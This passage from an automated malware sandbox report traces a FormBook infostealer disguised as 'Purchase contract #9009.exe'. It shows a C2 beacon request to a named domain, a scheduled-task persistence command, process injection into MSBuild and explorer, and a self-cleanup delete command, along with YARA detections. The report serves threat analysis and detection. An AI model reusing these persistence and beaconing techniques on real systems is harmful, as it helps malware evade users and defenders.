                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      8192.168.2.449770146.148.189.19480
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:59:13.174427986 CEST6547OUTGET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.backtothesimplethings.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Aug 3, 2021 22:58:00.969641924 CEST58749774192.185.90.36192.168.2.4421 lasalle.websitewelcome.com: SMTP command timeout - closing connection

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:22:57:01
                                                                      Start date:03/08/2021
                                                                      Path:C:\Users\user\Desktop\Purchase contract #9009.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\Purchase contract #9009.exe'
                                                                      Imagebase:0x100000
                                                                      File size:1374720 bytes
                                                                      MD5 hash:ACFF75235867DD82B2679B4AFD3AD525
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:22:57:12
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
                                                                      Imagebase:0xf70000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:22:57:13
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:22:57:13
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      Imagebase:0xbe0000
                                                                      File size:261728 bytes
                                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:22:57:15
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:22:57:37
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0x180000
                                                                      File size:3611360 bytes
                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:22:57:41
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:22:57:41
                                                                      Start date:03/08/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >